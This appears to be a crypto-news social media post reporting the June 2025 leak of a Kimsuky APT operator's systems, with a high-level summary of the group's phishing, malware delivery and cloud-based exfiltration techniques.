In June 2025, the cybersecurity community was shaken. A member of the notorious North Korean hacking group Kimsuky APT became the victim of a massive data breach, revealing hundreds of gigabytes of sensitive internal files, tools, and operational details.
According to security experts from Slow Mist, the leaked data included browser histories, detailed phishing campaign logs, manuals for custom backdoors and attack systems such as the TomCat kernel backdoor, modified Cobalt Strike beacons, the Ivanti RootRot exploit, and Android malware like Toybox.
Two Compromised Systems and Hacker “KIM”
The breach was linked to two compromised systems operated by an individual known as “KIM” – one was a Linux developer workstation (Deepin 20.9), the other a publicly accessible VPS server.
The Linux system was likely used for malware development, while the VPS hosted phishing materials, fake login portals, and command-and-control (C2) infrastructure.
The leak was carried out by hackers identifying themselves as “Saber” and “cyb0rg”, who claimed to have stolen and published the contents of both systems. While some evidence ties “KIM” to known Kimsuky infrastructure, linguistic and technical indicators also suggest a possible Chinese connection, leaving the true origin uncertain.
A Long History of Cyber Espionage
Kimsuky has been active since at least 2012 and is linked to the Reconnaissance General Bureau, North Korea’s primary intelligence agency. It has long specialized in cyber espionage targeting governments, think tanks, defense contractors, and academia.
In 2025, its campaigns – such as DEEP#DRIVE – relied on multi-stage attack chains. They typically began with ZIP archives containing LNK shortcut files disguised as documents, which, when opened, executed PowerShell commands to download malicious payloads from cloud services like Dropbox, using decoy documents to appear legitimate.
Advanced Techniques and Tools
In spring 2025, Kimsuky deployed a mix of VBScript and PowerShell hidden inside ZIP archives to:
Log keystrokes
Steal clipboard data
Harvest cryptocurrency wallet keys from browsers (Chrome, Edge, Firefox, Naver Whale)
Attackers also paired malicious LNK files with VBScripts that executed mshta.exe to load DLL-based malware directly into memory. They used custom RDP Wrapper modules and proxy malware to enable covert remote access.
Programs like forceCopy extracted credentials from browser configuration files without triggering standard password access alerts.
Exploiting Trusted Platforms
Kimsuky abused popular cloud and code-hosting platforms. In a June 2025 spear phishing campaign targeting South Korea, private GitHub repositories were used to store malware and stolen data.
By delivering malware and exfiltrating files via Dropbox and GitHub, the group was able to hide its activity within legitimate network traffic.
#NorthKoreaHackers , #cyberattacks , #CyberSecurity , #phishingscam , #worldnews
Stay one step ahead – follow our profile and stay informed about everything important in the world of cryptocurrencies!
Notice:
,,The information and views presented in this article are intended solely for educational purposes and should not be taken as investment advice in any situation. The content of these pages should not be regarded as financial, investment, or any other form of advice. We caution that investing in cryptocurrencies can be risky and may lead to financial losses.“